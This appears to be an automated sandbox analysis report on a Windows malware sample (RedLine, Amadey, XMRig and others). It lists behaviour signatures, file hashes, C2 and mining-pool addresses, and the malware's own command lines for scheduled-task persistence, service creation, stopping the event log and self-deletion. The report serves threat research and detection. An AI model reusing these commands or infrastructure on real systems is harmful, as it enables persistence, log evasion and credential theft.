Analysis Overview
SHA256
3c2e54cf5340c3b1c1a013e1748db7359339eb1280d73f7f3278eab8c40f7b63
Threat Level: Known bad
The file ec2c94a21a52027c229a7824d4a1c5ca.bin was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
RisePro
xmrig
Amadey
Detect ZGRat V1
ZGRat
XMRig Miner payload
Modifies Windows Firewall
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Blocklisted process makes network request
Checks BIOS information in registry
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Launches sc.exe
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious behavior: CmdExeWriteProcessMemorySpam
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-24 04:15
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-24 04:15
Reported
2024-01-24 04:18
Platform
win7-20231215-en
Max time kernel
139s
Max time network
154s
Command Line
Signatures
Amadey
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
ZGRat
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\num.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000564001\\num.exe" | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\rback.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000567001\\rback.exe" | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2156 set thread context of 2216 | N/A | C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2980 set thread context of 2492 | N/A | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | C:\Windows\system32\conhost.exe |
| PID 2980 set thread context of 2484 | N/A | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | C:\Windows\system32\conhost.exe |
| PID 1868 set thread context of 1784 | N/A | C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe
"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"
C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
"C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe"
C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe"
C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
"C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p4632370330209207692137030328 -oextracted
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
"C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_9.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_8.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "xfAk7rC2FeEN35Y8o.exe"
C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe
"xfAk7rC2FeEN35Y8o.exe"
C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe
"C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "FLWCUERA"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "FLWCUERA"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {26E75C87-5A32-40B2-A05C-DB3831445712} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| FI | 109.107.182.3:80 | 109.107.182.3 | tcp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| DE | 144.76.1.85:25894 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| US | 8.8.8.8:53 | joxi.net | udp |
| US | 172.67.162.70:80 | joxi.net | tcp |
| US | 172.67.162.70:443 | joxi.net | tcp |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp | |
| NL | 80.79.4.61:18236 | tcp |
Files
memory/1588-0-0x0000000000260000-0x0000000000668000-memory.dmp
memory/1588-1-0x0000000000260000-0x0000000000668000-memory.dmp
memory/1588-3-0x00000000006F0000-0x00000000006F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
| MD5 | ec2c94a21a52027c229a7824d4a1c5ca |
| SHA1 | b17aa25017bf7d0af7ffb946bcace0d51331d351 |
| SHA256 | cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e |
| SHA512 | f44190b724851959ad712af3fecf4c397386b81a2c5f4258bd0b5ce028b173f29d57a296a448d1568d5de3eb25623f119cea3cabbee6c753890fe3e006df0761 |
memory/1588-13-0x0000000004520000-0x0000000004928000-memory.dmp
memory/2784-12-0x00000000001D0000-0x00000000005D8000-memory.dmp
memory/2784-15-0x00000000001D0000-0x00000000005D8000-memory.dmp
memory/1588-14-0x0000000000260000-0x0000000000668000-memory.dmp
\??\c:\users\admin\appdata\local\temp\F59E91F8
| MD5 | 5cac70fbe2fc9869397bf1989e592841 |
| SHA1 | cc522bec3c1772269465799d35268630248e801b |
| SHA256 | 17e571023337ad513deb4d436c17573b6ab3c9ebf2a3e30425c3f5fa9a638806 |
| SHA512 | f56d8d7a996401404b850b6503960ea17d68fe56acbc06de8fa9c39b20dd7f01d24837283f459655ac4efb3da10a8864623cbb041ca9ad81bc9afd1ecf9b5fb9 |
C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
| MD5 | b65204b855a9031d3a1e8480899ed0ce |
| SHA1 | bae418328b0bd303dc712a1861771451da0df0dc |
| SHA256 | 39dd749c32c81af709f676a0bcb808191244439090f6404aabb445d16723a2e2 |
| SHA512 | 43c5309c42bacf69df58880b9dafdf2652fe3d66acad779c95bce29272de696d94cdb5bd3437ab192db99cf44eedf3da4b3e7483db15cdcbe22ea3d721210a60 |
C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
| MD5 | cb0c32dbd9299ced29a49721c9665815 |
| SHA1 | 0c90839639eed636b94f8f2ca43dee0f495e6218 |
| SHA256 | 7d87e7dbcb78412a71770d9b6361611af4062ef29ece3878c9ed921fbe5672da |
| SHA512 | a90c2bf577c6c5f1161863025dc8fb48fe253a5cb4a071a425f009599495fea17a2cbb1017317e162fc3ef99c090ed6e63dda2071e802def364654d4cd59df12 |
C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
| MD5 | d5af5fe1f4a7f598abfefdba5f2c755d |
| SHA1 | fbf50fd43a5ac059b35f239e1ad7c710289800cb |
| SHA256 | d4027a5e8436b4887830bc890345cb061a0b6d38962f76f68990424345a8b840 |
| SHA512 | db3dea30f75728a0010f31d72981342a2b851d2b6f41718b8bd9351e6153ff3fdb03509bde8ee5fed52c12f3522790562a6508e7140a50486218ef01bf5626d5 |
C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
| MD5 | dc41db2f1a79d6a6fe0d35c842b39adc |
| SHA1 | 59b155df668de78669f45a741dc1581f835d674d |
| SHA256 | fcc65263f1b2ce58bf23b3c1da6ac08b8b10ff1824d100a4852f01a9832013a3 |
| SHA512 | 361a79323e6cb03a01ae2d641cd7952425bf41ede79de770c2e79312c67f8338a72c3d979da86feaa3a224661623533a222891d547e61fbe237e395f5fdd84ca |
\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
| MD5 | 73102c5b3abea202c716dc000639501f |
| SHA1 | 9f25b23dc8c3132f707490b747bdc110aa0a1bf4 |
| SHA256 | 47ead837fbf7d50b81ee8cde52fc82fe07134b3a522e1ca5fe80f0c9ff55df30 |
| SHA512 | 90e999b71ae0aa7ac6cf7488ace95d571ec57360cfdd8d889c467945f908272204e276c167ff4621f14e3d22d3366d482d3cb962f1d3a7261a822e77b2a59163 |
memory/2784-48-0x0000000004730000-0x0000000004C13000-memory.dmp
memory/1728-49-0x0000000001120000-0x0000000001603000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
| MD5 | d177caf6762f5eb7e63e33d19c854089 |
| SHA1 | f25cf817e3272302c2b319cedf075cb69e8c1670 |
| SHA256 | 4296e28124f0def71c811d4b21284c5d4e1a068484db03aeae56f536c89976c0 |
| SHA512 | 9d0e67e35dac6ad8222e7c391f75dee4e28f69c29714905b36a63cf5c067d31840aaf30e79cfc7b56187dc9817a870652113655bec465c1995d2a49aa276de25 |
memory/2552-72-0x0000000001E90000-0x0000000001ED2000-memory.dmp
memory/2552-86-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/2552-98-0x0000000004830000-0x0000000004870000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 4b3a5b96f9eedd8626a8c12976765b56 |
| SHA1 | 85307e380d233c8229f9e0de16ed82821221a0be |
| SHA256 | 1651b6ed815b2128c2362ad38a7cfcdafc6c5f8705572626c872ad788c41f6ef |
| SHA512 | b274c74ebf059fa203408a120a2c6f54f769d93d34d916aad9b4f712455b3ffe396e325744d2488a090dafb1c4621f83428719c8fe20d93b10904953dcdc8790 |
memory/2140-101-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/2552-102-0x0000000004830000-0x0000000004870000-memory.dmp
memory/2140-103-0x00000000048C0000-0x0000000004900000-memory.dmp
memory/2552-104-0x0000000004830000-0x0000000004870000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 5adb0fa82d102152c869f831bdf2ad89 |
| SHA1 | bba32248250524ba6ef6dd499462ddc02e2bc720 |
| SHA256 | 2055429dc5a7506e14e3fc328a278c61992147ed12a368243f1a5e5535f7a327 |
| SHA512 | e20d652ff39c95ca34c8ad6378e15b24853f23ad34c1e610eead1bee39f0aaef1187abc120e9b3a96e16b58ec38d929d71e220e17ad968f8c8f7a5f328cb9681 |
\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
| MD5 | 2fadc3984b71f0fd08c832adeedf2b52 |
| SHA1 | cc1fc06a55af72364fb0a1266d3f5936577162f9 |
| SHA256 | 34f47e63788cdb398c48ad06f3878ec9bce9fd0e261306b2c81b3796925f9240 |
| SHA512 | 63e8127e2d44cd98cd6225eb8d1f348f5e3e7d7f86900e2f949329f6d35a943147aa1fb72061a8868cfcd9e53fde536dc870b3a9c9248b6aab067774b1654685 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
| MD5 | 5eca966dd56f0189904b8240878cba81 |
| SHA1 | 770520d011c21409b93a77bf45fc858ccaaaa8af |
| SHA256 | b09dd6fd6cb440cd5263f442082effb1089961d2c1ff86dd5cc5e47e78aa350e |
| SHA512 | 99cdf082fe098418a33eeba18799b6ccf22e08de99cab546f0add72d941fec7363c0a8d073283369c7cbd66d67ebdb0803215d19944aa30db576d467a65c2953 |
memory/2784-133-0x00000000001D0000-0x00000000005D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip
| MD5 | 40235b44032f0152340cf8abf962b5cc |
| SHA1 | a47551c300cb4491e9dc82734466d243e8eee584 |
| SHA256 | 3a424ab07ae35d2f8ecee2b7117b477b092c429d49323eba29ba0afe15a1ad22 |
| SHA512 | 82fdf657ba3c6be68d266218c15c58b2fb758d82241e86459f0a30e6c2bb4728a62f2c14a1a52df79c118cf2c9e6e19690e5f8a408acf5cf9a4455cd7145eaf3 |
\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 931afc729d4dc9c815f25a6e71605882 |
| SHA1 | cb03ffc5bdfad24ea2f85bc72302b8b518b8c841 |
| SHA256 | e6610aee9c7eccfd728c524ef30047f1fff02f5023e80a6f7f0dc41a9642dbff |
| SHA512 | 7071d8d9ed5c8a63ac4cbbc16ee53417b4e2c8fb5007f901e5d538f43859d343816758d22e96a9ef3d3e22318206068cdca1a213be77da8d382bde0d851622ad |
memory/1808-134-0x00000000737B0000-0x0000000073E9E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
| MD5 | 219bbf6cbe4a20ce93e50137a47c9be3 |
| SHA1 | 25d68c1f11d5624bcc94e5bf9d382fad55d3058f |
| SHA256 | 47d7c430478b2cc240f9077f22051146c30412868ada9289c819c9ec16c612ae |
| SHA512 | 17df2bd3a6d83f91690ec806056b34a9860216c259a16c7e7cfcc1a8f7ce823e5e58474b4ae38b876fb0f5ec8f338f819e69276fb63b635b757e26351127ba1a |
memory/1808-131-0x0000000000990000-0x0000000000A9A000-memory.dmp
memory/2784-125-0x00000000001D0000-0x00000000005D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
| MD5 | 3c9da20ad78d24df53b661b7129959e0 |
| SHA1 | e7956e819cc1d2abafb2228a10cf22b9391fb611 |
| SHA256 | 2fd37ed834b6cd3747f1017ee09b3f97170245f59f9f2ed37c15b62580623319 |
| SHA512 | 1a02da1652a2c00df33eceda0706adebb5a5f1c3c05e30a09857c94d2fbb93e570f768af5d6648d3a5d11eea3b5c4b1ceb9393fc05248f1eefd96e17f3bbe1b4 |
memory/2156-161-0x0000000001300000-0x000000000136C000-memory.dmp
memory/2156-157-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/2140-164-0x00000000048C0000-0x0000000004900000-memory.dmp
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
memory/2156-174-0x0000000004E50000-0x0000000004E90000-memory.dmp
memory/2552-165-0x0000000004830000-0x0000000004870000-memory.dmp
memory/1808-163-0x00000000005E0000-0x0000000000620000-memory.dmp
memory/2552-151-0x0000000002120000-0x000000000215E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip
| MD5 | aaa97cae61f10770ab65892fb10b827d |
| SHA1 | 0f5f5b27b4603a2a9a6d778263ca402d22fc964f |
| SHA256 | 96767258e636d6cd1334d3ca67a1d9f483a090a78d9bafbd3a7bc8837ec998c3 |
| SHA512 | dde8270e6699050ce428bfb442d95089b97ad2c351efe9d5d9898a4cd0ded3f5e88f22572a6aecb72a0250b4f3f76ddf933f9853f5761d5676719c886d15d295 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip
| MD5 | 11f1ca0c43391dc92905d9f728428e68 |
| SHA1 | 2287377b147573503e20abd97330a681eca88b9d |
| SHA256 | 704255efb181a254b7ee6da512ea67db6243881c8dfddd520337d1a3aa4ee9b5 |
| SHA512 | 14ef19ebb5eb017edeb203f263c4f64f9f58adb5715ce11dab258ff09b51bcdf072cc9678ca110fcc0cf4e43f9c64726d0b719b95408b2c321c1bb5baf8cc62c |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | 29d5a47c9a1eccdbd25c49cd540f742f |
| SHA1 | 81332aed09c142f8ee235c0303c9cae2466a96f3 |
| SHA256 | bd48f756c7c1d7883b2ae5934260ce04b08e488108ca75953a8e8fe9ee89770c |
| SHA512 | 051039bc5e23fdc0273c7f6e78655c285de84f2b64358af857d5a25d9df01515fedd5ec0f91c7e8d9a8faf00c9a2412d3b0c322a4110ce335fae4abd6fecd089 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | fe835c127049c665c997e7bf7b5b85f5 |
| SHA1 | fe1b418c2b5eca8f800db39a3740b276c95a41ea |
| SHA256 | 620d0bb3e2f0f8ac7e96623f89842433a4bea299f9d8c8481fba868ba15f8930 |
| SHA512 | 284244c3887ce3f10d387c56e59969f763de33517f36c2393e4bee56fb91306f3e0c5b2e162f37c07b490e6a354e57edd71b31317509191eaa4879140c08a680 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 781e90fd2d92487c572cb80b35067285 |
| SHA1 | 0b436e2afdd1cc954ddc86b22500540624d0e598 |
| SHA256 | 037ecc54896d74db57489337f7ffff292ad7f8e650833689efc763293e0ae6f1 |
| SHA512 | 13f47e023297520eb0a0f3aff657158d91c92cb770ed706ad73b95e087bec22e0475e28f427af853c2786b9b2fa8cb7f2fa06ccde847f3f3e32d93d7fe10685a |
memory/2784-215-0x0000000004730000-0x0000000004C13000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | eb8ae67add0315dd587f99d81e0f53f7 |
| SHA1 | 8d2e1afc03e3549775065f541417778eea6c3e6e |
| SHA256 | 95379f57e916b94e093e3bef9f4a7d92869951b6c369c5801fedd48a72b5efde |
| SHA512 | 4485773f12fcb34a1fed8e9b764c98e629239e51d99623deba17c237e59d1ad23ad2d755cd0917cb6789b0c52471c9b21f8c0ff2898c8e74ea0b577930d2079a |
\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | e27ed9139b5deae4b799ef17880eb82f |
| SHA1 | 210f8087ce88aeb5eb0cdd8a7992adbd3cb35e1e |
| SHA256 | b293901df19277cd5908ea67aa9503839631ae19f312eaf378296f0642f18ead |
| SHA512 | 4fa7c75230a7f5a8b760534a28cc74f7beff2fc302c9ac70e6de9544e4d892e09387351ace4d523c4f0e18c2bdff5fffc0f15bf680cad88dc54a65b3a978167e |
\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 2ac9bea08704210b2537fcbd3f244496 |
| SHA1 | 8ee3e4f4b2a582c97b80a3f5a0e2344c43d6bfa3 |
| SHA256 | c3c3ac7c56ca6e9387dbf41b1a3e3708ece828b6260a30f8a5d67d4ae27763fd |
| SHA512 | 7db3f1988b0384046a837c9df0917be5810b1596477643eaa2fa40fd2e21a52756a1d58616b8445d1c08aada48bf5ba972bfa3f6dba392f448f9678bab441682 |
memory/1728-223-0x0000000001120000-0x0000000001603000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | 24ca7dbb6f0cc43aa650807593091ff2 |
| SHA1 | db0e37151a82120c3519f3b587b8ad452e96fc75 |
| SHA256 | 216f5cd816b0bbc83a27d4d9198994a85eca951e571983e82e3d9fa51a1aac8f |
| SHA512 | 2b13d8e66979ede339338f786db9d8788ac4aac3d383ed2e491c51418022c6342484d659cdc4fd55f3b03141286cfc245187a978ef5fdf9c9d015dbd1dea9d86 |
memory/2552-233-0x00000000737B0000-0x0000000073E9E000-memory.dmp
memory/1728-234-0x0000000001120000-0x0000000001603000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | 49de8961e3d7dcbc6a0bc6d5800c17dd |
| SHA1 | 7b5b96d1217b8a6fc1587a8920ea587d86a804c3 |
| SHA256 | bf26a770ef4fdd475d4789eb9e9572c6b3dba2d81159f4e2e15bdd4bc11b3b95 |
| SHA512 | bbee597d3940403a51ad4defdd9e8b56cb575d44d7513a630ad82def0a401a4eeade58d93e7d2819d7e6c0d55a430916ab0a9cf9bb6f69d0b510a84ddab2b118 |
